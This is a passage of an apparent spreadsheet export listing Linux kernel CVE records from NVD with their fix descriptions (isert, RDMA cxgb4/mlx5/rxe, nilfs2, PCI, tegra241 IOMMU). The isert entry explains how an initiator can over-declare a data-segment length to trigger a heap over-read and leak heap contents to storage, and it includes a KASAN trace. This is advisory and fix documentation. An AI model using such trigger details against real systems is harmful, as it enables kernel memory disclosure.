                            isert_get_data(rx_desc), imm_data_len);
Because the declared length is never checked against wc-&gt;byte_len, an
initiator can declare a data segment larger than the bytes it actually
sent (and larger than the descriptor) and cause an out-of-bounds read of
the receive buffer.
Nothing upstream of isert closes this door:
  - __iscsit_check_dataout_hdr() bounds the inbound payload against
    conn_ops-&gt;MaxXmitDataSegmentLength (MXDSL) - a transmit parameter,
    used here for the inbound check.
  - iscsi_set_connection_parameters() sets
    ops-&gt;MaxXmitDataSegmentLength = ops-&gt;TargetRecvDataSegmentLength;
    and TARGETRECVDATASEGMENTLENGTH is absent from the min()-clamp list in
    iscsi_check_acceptor_state(), so the value the initiator declares is
    adopted verbatim (type range 512..16777215). The initiator effectively
    raises its own ceiling.
  - isert never clamps the negotiated value to its own fixed receive
    descriptor (ISER_RX_SIZE, 9216 bytes), so the target core's bound and
    the descriptor size are unrelated.
The imm_data_len == data_len path is more than an over-read: it aliases
the receive descriptor via sg_set_buf() and passes it to the backend as
the data source for the SCSI WRITE, so an over-declared length causes heap
contents past the descriptor to be written through the backend to the
backing store. The backend is the victim of the oversized scatterlist
isert hands it, not the cause; no read-back of the written bytes was
demonstrated.
Trigger: after login completes (full feature phase), an initiator that has
declared a large TargetRecvDataSegmentLength and a FirstBurstLength that
permits unsolicited/immediate data sends a PDU whose declared data-segment
length exceeds what was received. With KASAN:
  BUG: KASAN: slab-out-of-bounds in sg_copy_buffer+0x150/0x1c0
  Read of size 4096 at addr ffff888109720800 by task kworker/1:0H/25
  Workqueue: ib-comp-wq ib_cq_poll_work
  Call Trace:
   sg_copy_buffer+0x150/0x1c0
   isert_recv_done+0xba6/0x2390
   __ib_process_cq+0xe1/0x390
   ib_cq_poll_work+0x46/0x150
isert_recv_done+0xba6 resolves to isert_handle_iscsi_dataout()
(ib_isert.c:1160), inlined through isert_rx_opcode().
Validate wc-&gt;byte_len against the framing in isert_recv_done() before the
PDU reaches any handler, and reinstate the connection if it is short.
Because the test compares without subtracting the header length, it also
rejects PDUs shorter than the iSER and iSCSI headers, which would otherwise
be parsed out of stale descriptor contents. The login handler rejects PDUs
shorter than ISER_HEADERS_LEN (commit 29e7b925ae6d ("IB/isert: Reject login
PDUs shorter than ISER_HEADERS_LEN")) but does not bound the declared
length either; that is fixed in the next patch. The data handlers had no
length check at all.
isert reads the data segment from a fixed offset: isert_get_data()
returns the iSER header plus ISER_HEADERS_LEN and makes no adjustment for
an AHS.  The bytes the handlers touch are therefore exactly
[ISER_HEADERS_LEN, ISER_HEADERS_LEN + dlength), and comparing that sum
against wc-&gt;byte_len bounds precisely the region that is read.  An AHS
term would only make the test stricter without bounding anything furth
---truncated---</t>
        </is>
      </c>
      <c r="T782" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90414</t>
        </is>
      </c>
    </row>
    <row r="783">
      <c r="A783" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B783" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C783" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90415</t>
        </is>
      </c>
      <c r="D783" s="5" t="inlineStr"/>
      <c r="E783" s="5" t="inlineStr"/>
      <c r="F783" s="5" t="inlineStr"/>
      <c r="G783" s="5" t="inlineStr"/>
      <c r="H783" s="5" t="inlineStr"/>
      <c r="I783" s="5" t="inlineStr"/>
      <c r="J783" s="5" t="inlineStr"/>
      <c r="K783" s="5" t="inlineStr"/>
      <c r="L783" s="5" t="inlineStr"/>
      <c r="M783" s="5" t="inlineStr"/>
      <c r="N783" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O783" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P783" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q783" s="5" t="inlineStr"/>
      <c r="R783" s="5" t="inlineStr"/>
      <c r="S783" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
RDMA/cxgb4: free STAG index when TPT entry write fails
write_tpt_entry() allocates a new STAG index with c4iw_get_resource() and
bumps stats.stag.cur before programming the entry.  When
write_adapter_mem() fails, it returns the error without releasing the index
or reversing the statistic.  No MR is inserted into rhp-&gt;mrs, so
deregistration never reclaims it, leaking the index until device teardown.
Record whether this call allocated the index and, on a failed write, return
it to tpt_table and decrement stats.stag.cur.  Key the rollback on both the
write error and that flag, not the error alone: a non-reset update carries
a caller-owned STAG that this call did not allocate and must not free.</t>
        </is>
      </c>
      <c r="T783" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90415</t>
        </is>
      </c>
    </row>
    <row r="784">
      <c r="A784" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B784" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C784" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90416</t>
        </is>
      </c>
      <c r="D784" s="5" t="inlineStr"/>
      <c r="E784" s="5" t="inlineStr"/>
      <c r="F784" s="5" t="inlineStr"/>
      <c r="G784" s="5" t="inlineStr"/>
      <c r="H784" s="5" t="inlineStr"/>
      <c r="I784" s="5" t="inlineStr"/>
      <c r="J784" s="5" t="inlineStr"/>
      <c r="K784" s="5" t="inlineStr"/>
      <c r="L784" s="5" t="inlineStr"/>
      <c r="M784" s="5" t="inlineStr"/>
      <c r="N784" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O784" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P784" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q784" s="5" t="inlineStr"/>
      <c r="R784" s="5" t="inlineStr"/>
      <c r="S784" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
RDMA/mlx5: Fix stack out-of-bounds read in cc_params debugfs
get_param() reads a congestion parameter as a u32 but formats it with the
signed "%d" into an 11-byte stack buffer. A value with bit 31 set, such as
0x80000000, renders as "-2147483648\n" whose full length is 12. snprintf()
stores only 11 bytes yet returns 12, so simple_read_from_buffer() treats 12
bytes as valid and reads one byte past lbuf[].
Size the buffer for the widest unsigned decimal, format with "%u" to match
the u32, and use scnprintf() so the length passed to
simple_read_from_buffer() reflects the bytes actually stored.</t>
        </is>
      </c>
      <c r="T784" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90416</t>
        </is>
      </c>
    </row>
    <row r="785">
      <c r="A785" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B785" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C785" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90417</t>
        </is>
      </c>
      <c r="D785" s="5" t="inlineStr"/>
      <c r="E785" s="5" t="inlineStr"/>
      <c r="F785" s="5" t="inlineStr"/>
      <c r="G785" s="5" t="inlineStr"/>
      <c r="H785" s="5" t="inlineStr"/>
      <c r="I785" s="5" t="inlineStr"/>
      <c r="J785" s="5" t="inlineStr"/>
      <c r="K785" s="5" t="inlineStr"/>
      <c r="L785" s="5" t="inlineStr"/>
      <c r="M785" s="5" t="inlineStr"/>
      <c r="N785" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O785" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P785" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q785" s="5" t="inlineStr"/>
      <c r="R785" s="5" t="inlineStr"/>
      <c r="S785" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
RDMA/cxgb4: Fix dereg_skb leak and double free in write_tpt_entry()
When the device is in the fatal error state, write_tpt_entry() returns -EIO
before handing the caller's preallocated skb to the transmit path; its
allocation-failure returns do the same. c4iw_dereg_mr() ignores the error
and frees mhp, leaking mhp-&gt;dereg_skb. c4iw_get_dma_mr() instead frees the
skb a second time after dereg_mem() already consumed it, a double free.
Make write_tpt_entry() the sole owner of a non-NULL skb, freeing it on
every return preceding handoff to c4iw_ofld_send(): fatal error, tpt and
stag allocation failure. c4iw_ofld_send() consumes the skb on success and
error alike, so drop the redundant kfree_skb() in c4iw_get_dma_mr() after
dereg_mem().</t>
        </is>
      </c>
      <c r="T785" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90417</t>
        </is>
      </c>
    </row>
    <row r="786">
      <c r="A786" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B786" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C786" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90418</t>
        </is>
      </c>
      <c r="D786" s="5" t="inlineStr"/>
      <c r="E786" s="5" t="inlineStr"/>
      <c r="F786" s="5" t="inlineStr"/>
      <c r="G786" s="5" t="inlineStr"/>
      <c r="H786" s="5" t="inlineStr"/>
      <c r="I786" s="5" t="inlineStr"/>
      <c r="J786" s="5" t="inlineStr"/>
      <c r="K786" s="5" t="inlineStr"/>
      <c r="L786" s="5" t="inlineStr"/>
      <c r="M786" s="5" t="inlineStr"/>
      <c r="N786" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O786" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P786" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q786" s="5" t="inlineStr"/>
      <c r="R786" s="5" t="inlineStr"/>
      <c r="S786" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
nilfs2: fix BUG in nilfs_copy_dirty_pages() on dirty state mismatch
Syzbot reported a kernel BUG triggered within nilfs_copy_dirty_pages(),
which copies dirty DAT file folios/pages to its shadow page cache.  The
BUG occurs when a retrieved dirty folio/page unexpectedly loses its
'dirty' status.
This issue arises because, since the commit referenced below, the 'dirty'
flag of a folio/page can be cleared asynchronously after the filesystem
detects metadata corruption and transitions to read-only mode.
Resolve the issue by returning an -EROFS error if the filesystem has
transitioned to read-only mode.  Also change the behavior to issue a
kernel warning only once instead of triggering a kernel BUG when this
unexpected 'dirty' state is detected while the filesystem is not in
read-only mode.</t>
        </is>
      </c>
      <c r="T786" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90418</t>
        </is>
      </c>
    </row>
    <row r="787">
      <c r="A787" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B787" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C787" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90419</t>
        </is>
      </c>
      <c r="D787" s="5" t="inlineStr"/>
      <c r="E787" s="5" t="inlineStr"/>
      <c r="F787" s="5" t="inlineStr"/>
      <c r="G787" s="5" t="inlineStr"/>
      <c r="H787" s="5" t="inlineStr"/>
      <c r="I787" s="5" t="inlineStr"/>
      <c r="J787" s="5" t="inlineStr"/>
      <c r="K787" s="5" t="inlineStr"/>
      <c r="L787" s="5" t="inlineStr"/>
      <c r="M787" s="5" t="inlineStr"/>
      <c r="N787" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O787" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P787" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q787" s="5" t="inlineStr"/>
      <c r="R787" s="5" t="inlineStr"/>
      <c r="S787" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
nilfs2: prevent out-of-bounds read in super root block parsing
super-root inode metadata size is trusted before nilfs_read_inode_common().
Reject super-root inode sizes whose computed on-disk footprint exceeds the
filesystem block size. This prevents malformed filesystem images from
making nilfs_read_inode_common() read past the end of the super-root block.
[ryusuke: clarify the commit title]</t>
        </is>
      </c>
      <c r="T787" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90419</t>
        </is>
      </c>
    </row>
    <row r="788">
      <c r="A788" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B788" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C788" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90420</t>
        </is>
      </c>
      <c r="D788" s="5" t="inlineStr"/>
      <c r="E788" s="5" t="inlineStr"/>
      <c r="F788" s="5" t="inlineStr"/>
      <c r="G788" s="5" t="inlineStr"/>
      <c r="H788" s="5" t="inlineStr"/>
      <c r="I788" s="5" t="inlineStr"/>
      <c r="J788" s="5" t="inlineStr"/>
      <c r="K788" s="5" t="inlineStr"/>
      <c r="L788" s="5" t="inlineStr"/>
      <c r="M788" s="5" t="inlineStr"/>
      <c r="N788" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O788" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P788" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q788" s="5" t="inlineStr"/>
      <c r="R788" s="5" t="inlineStr"/>
      <c r="S788" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
nilfs2: fix infinite loop in nilfs_clean_segments()
syzbot reported a hung task in nilfs_transaction_begin(). This occurs
because the cleaner ioctl falls into an infinite loop if
nilfs_segctor_construct() repeatedly returns -EROFS (e.g. the device
is remounted as read-only after an I/O error).
Currently in nilfs_clean_segments(), if err is non-zero, it logs the
error and sleeps but doesn't abort when it encounters a terminal error
like -EROFS. This causes the thread to loop forever.
Fix this by breaking out of the loop if nilfs_segctor_construct()
returns -EROFS. This matches the behaviour in
nilfs_segctor_write_out(), which also handles -EROFS.</t>
        </is>
      </c>
      <c r="T788" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90420</t>
        </is>
      </c>
    </row>
    <row r="789">
      <c r="A789" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B789" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C789" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90421</t>
        </is>
      </c>
      <c r="D789" s="5" t="inlineStr"/>
      <c r="E789" s="5" t="inlineStr"/>
      <c r="F789" s="5" t="inlineStr"/>
      <c r="G789" s="5" t="inlineStr"/>
      <c r="H789" s="5" t="inlineStr"/>
      <c r="I789" s="5" t="inlineStr"/>
      <c r="J789" s="5" t="inlineStr"/>
      <c r="K789" s="5" t="inlineStr"/>
      <c r="L789" s="5" t="inlineStr"/>
      <c r="M789" s="5" t="inlineStr"/>
      <c r="N789" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O789" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P789" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q789" s="5" t="inlineStr"/>
      <c r="R789" s="5" t="inlineStr"/>
      <c r="S789" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
PCI: Fix UAF when probe runs concurrent to dyn ID removal
Dynamic IDs are only guaranteed to be valid when dynids.lock is held,
as remove_id_store() can free the node. Thus, make a copy in
pci_match_device(). Also, clarify that the id parameter is only valid
during probe.</t>
        </is>
      </c>
      <c r="T789" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90421</t>
        </is>
      </c>
    </row>
    <row r="790">
      <c r="A790" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B790" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C790" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90422</t>
        </is>
      </c>
      <c r="D790" s="5" t="inlineStr"/>
      <c r="E790" s="5" t="inlineStr"/>
      <c r="F790" s="5" t="inlineStr"/>
      <c r="G790" s="5" t="inlineStr"/>
      <c r="H790" s="5" t="inlineStr"/>
      <c r="I790" s="5" t="inlineStr"/>
      <c r="J790" s="5" t="inlineStr"/>
      <c r="K790" s="5" t="inlineStr"/>
      <c r="L790" s="5" t="inlineStr"/>
      <c r="M790" s="5" t="inlineStr"/>
      <c r="N790" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O790" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P790" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q790" s="5" t="inlineStr"/>
      <c r="R790" s="5" t="inlineStr"/>
      <c r="S790" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
clk: mediatek: pllfh: Fix IO remapping leak in register_pllfhs error path
When mtk_clk_register_pllfhs function fails to register a PLL, it
unregisters all PLLs and cleans up itself in its error path before
returning, so the function callers don't need to do it.
But contrary to mtk_clk_unregister_pllfhs function, that does almost
the same sequence, it does not free the IO memory mapped on fhctl node,
leading to a leak.
Fix this leak by factorizing the cleanup sequence in a new private
function and use it both mtk_clk_register_pllfhs and
mtk_clk_unregister_pllfhs functions.
Also, change the loop index start value to avoid the -1 operation on
index at each loop.</t>
        </is>
      </c>
      <c r="T790" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90422</t>
        </is>
      </c>
    </row>
    <row r="791">
      <c r="A791" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B791" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C791" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90423</t>
        </is>
      </c>
      <c r="D791" s="5" t="inlineStr"/>
      <c r="E791" s="5" t="inlineStr"/>
      <c r="F791" s="5" t="inlineStr"/>
      <c r="G791" s="5" t="inlineStr"/>
      <c r="H791" s="5" t="inlineStr"/>
      <c r="I791" s="5" t="inlineStr"/>
      <c r="J791" s="5" t="inlineStr"/>
      <c r="K791" s="5" t="inlineStr"/>
      <c r="L791" s="5" t="inlineStr"/>
      <c r="M791" s="5" t="inlineStr"/>
      <c r="N791" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O791" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P791" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q791" s="5" t="inlineStr"/>
      <c r="R791" s="5" t="inlineStr"/>
      <c r="S791" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
RDMA/rxe: Fix UAF in ODP init error-handling path
rxe_odp_mr_init_user() stores &amp;umem_odp-&gt;umem in mr-&gt;umem before
calling rxe_odp_init_pages(). If rxe_odp_init_pages() fails,
rxe_odp_mr_init_user() releases umem_odp and returns an error.
rxe_reg_user_mr() then unwinds the error through rxe_cleanup(),
rxe_mr_cleanup(), ib_umem_release(mr-&gt;umem). There is an
IS_ERR_OR_NULL(umem) check at the start of ib_umem_release().
But since mr-&gt;umem is NOT reset to NULL in the error handling
path of rxe_odp_mr_init_user(), the check passes and it reads
already-freed fields like umem-&gt;is_dmabuf, causing UAF.
Fix the UAF by clearing mr-&gt;umem after releasing the failed
ODP umem so the MR cleanup path does not release it again.</t>
        </is>
      </c>
      <c r="T791" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90423</t>
        </is>
      </c>
    </row>
    <row r="792">
      <c r="A792" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B792" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C792" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90424</t>
        </is>
      </c>
      <c r="D792" s="5" t="inlineStr"/>
      <c r="E792" s="5" t="inlineStr"/>
      <c r="F792" s="5" t="inlineStr"/>
      <c r="G792" s="5" t="inlineStr"/>
      <c r="H792" s="5" t="inlineStr"/>
      <c r="I792" s="5" t="inlineStr"/>
      <c r="J792" s="5" t="inlineStr"/>
      <c r="K792" s="5" t="inlineStr"/>
      <c r="L792" s="5" t="inlineStr"/>
      <c r="M792" s="5" t="inlineStr"/>
      <c r="N792" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O792" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P792" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q792" s="5" t="inlineStr"/>
      <c r="R792" s="5" t="inlineStr"/>
      <c r="S792" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
iommu/tegra241-cmdqv: Fix VINTF0 leak on the init-failure path
tegra241_cmdqv_init_structures() allocates VINTF0 with kzalloc_obj(), inits
it, and preallocates its logical VCMDQs. Two of its error paths leak.
When tegra241_cmdqv_init_vintf() fails it returns before VINTF0 reaches the
cmdqv-&gt;vintfs[] array, so the devres unwind on probe failure cannot reach
it; free it directly there.
A later VCMDQ preallocation failure instead leaves VINTF0 published, and so
this time the unwind does reach tegra241_cmdqv_remove_vintf(), which then
frees it from vintf-&gt;hyp_own. But tegra241_vintf_hw_init() sets that flag
only afterward, from a HW read-back, so the still-uninited VINTF0 reads as
guest-owned and leaks, with mutex_destroy() and ida_destroy() run on fields
it never set up.
Decide ownership from vintf-&gt;idx instead, the index assigned when its id is
allocated: idx 0 is the kernel-owned VINTF0, while idx &gt;= 1 marks a guest
VINTF. So the in-kernel free decision in tegra241_cmdqv_remove_vintf() and
tegra241_vintf_free_lvcmdq() now keys on idx too, and hyp_own stays a pure
HW-readback state.</t>
        </is>
      </c>
      <c r="T792" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90424</t>
        </is>
      </c>
    </row>
    <row r="793">
      <c r="A793" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B793" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C793" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90425</t>
        </is>
      </c>
      <c r="D793" s="5" t="inlineStr"/>
      <c r="E793" s="5" t="inlineStr"/>
      <c r="F793" s="5" t="inlineStr"/>
      <c r="G793" s="5" t="inlineStr"/>
      <c r="H793" s="5" t="inlineStr"/>
      <c r="I793" s="5" t="inlineStr"/>
      <c r="J793" s="5" t="inlineStr"/>
      <c r="K793" s="5" t="inlineStr"/>
      <c r="L793" s="5" t="inlineStr"/>
      <c r="M793" s="5" t="inlineStr"/>
      <c r="N793" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O793" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P793" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q793" s="5" t="inlineStr"/>
      <c r="R793" s="5" t="inlineStr"/>
      <c r="S793" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
iommu/tegra241-cmdqv: Require exactly one Stream ID for a vSID
tegra241_vintf_init_vsid() maps a guest vSID to a single physical Stream ID
taken from master-&gt;streams[0], and only warns when the device does not have
exactly one stream. A device with several streams gets only its first one
mapped, so a guest vSID invalidation cannot reach the others' ATC and IOTLB
entries; a device with none makes master-&gt;streams a ZERO_SIZE_PTR, read out
of bounds.
Reject the mapping with -EOPNOTSUPP if master-&gt;num_streams is not one.</t>
        </is>
      </c>
      <c r="T793" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90425</t>
        </is>
      </c>
    </row>
    <row r="794">
      <c r="A794" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B794" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C794" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90426</t>
        </is>
      </c>
      <c r="D794" s="5" t="inlineStr"/>
      <c r="E794" s="5" t="inlineStr"/>
      <c r="F794" s="5" t="inlineStr"/>
      <c r="G794" s="5" t="inlineStr"/>
      <c r="H794" s="5" t="inlineStr"/>
      <c r="I794" s="5" t="inlineStr"/>
      <c r="J794" s="5" t="inlineStr"/>
      <c r="K794" s="5" t="inlineStr"/>
      <c r="L794" s="5" t="inlineStr"/>
      <c r="M794" s="5" t="inlineStr"/>
      <c r="N794" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O794" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P794" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q794" s="5" t="inlineStr"/>
      <c r="R794" s="5" t="inlineStr"/>
      <c r="S794" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
iommu/tegra241-cmdqv: Free the error IRQ before tearing down VINTFs
tegra241_cmdqv_remove() tears each VINTF down first, then calls free_irq().
Tearing a VINTF down frees vintf0 and clears cmdqv-&gt;vintfs[0]. An error in
that window makes tegra241_cmdqv_isr() read the stale slot and hand it to
tegra241_vintf0_handle_error(), which dereferences a NULL or freed pointer.
Free the IRQ before tearing the VINTFs down. free_irq() waits for in-flight
handlers to finish and blocks new ones, so no ISR can observe a VINTF as it
is torn down.
Note: a user-owned VINTF (viommu) could outlive this teardown, which unmaps
cmdqv-&gt;base and frees cmdqv-&gt;vintfs, so a later viommu close then touches
freed memory. This is neither introduced nor fixed here: a physical IOMMU
is not a pluggable device, so iommufd by design holds no reference on the
one behind a viommu, and this teardown is not expected while that viommu is
still alive.</t>
        </is>
      </c>
      <c r="T794" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90426</t>
        </is>
      </c>
    </row>
    <row r="795">
      <c r="A795" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B795" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C795" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90427</t>
        </is>
      </c>
      <c r="D795" s="5" t="inlineStr"/>
      <c r="E795" s="5" t="inlineStr"/>
      <c r="F795" s="5" t="inlineStr"/>
      <c r="G795" s="5" t="inlineStr"/>
      <c r="H795" s="5" t="inlineStr"/>
      <c r="I795" s="5" t="inlineStr"/>
      <c r="J795" s="5" t="inlineStr"/>
      <c r="K795" s="5" t="inlineStr"/>
      <c r="L795" s="5" t="inlineStr"/>
      <c r="M795" s="5" t="inlineStr"/>
      <c r="N795" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O795" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P795" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q795" s="5" t="inlineStr"/>
      <c r="R795" s="5" t="inlineStr"/>
      <c r="S795" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
iommu/tegra241-cmdqv: Don't fall back to a freed smmu after devm_krealloc()
__tegra241_cmdqv_probe() uses devm_krealloc() to grow @smmu into the larger
tegra241_cmdqv, which frees the original @smmu once it relocates. A failure
after that returned NULL, and the caller then dereferenced the freed @smmu
on its fallback path.
Return an int and take @smmu by reference instead, then update *smmu to the
reallocated pointer after devm_krealloc() succeeds, so the caller and its
fallback path both use the live @smmu rather than the freed original.</t>
        </is>
      </c>
      <c r="T795" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90427</t>
        </is>
      </c>
    </row>
    <row r="796">
      <c r="A796" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B796" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C796" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90428</t>
        </is>
      </c>
      <c r="D796" s="5" t="inlineStr"/>
      <c r="E796" s="5" t="inlineStr"/>
      <c r="F796" s="5" t="inlineStr"/>
      <c r="G796" s="5" t="inlineStr"/>
      <c r="H796" s="5" t="inlineStr"/>
      <c r="I796" s="5" t="inlineStr"/>
      <c r="J796" s="5" t="inlineStr"/>
      <c r="K796" s="5" t="inlineStr"/>
      <c r="L796" s="5" t="inlineStr"/>
      <c r="M796" s="5" t="inlineStr"/>
      <c r="N796" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O796" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P796" s="5" t="inlineStr">
        <is>
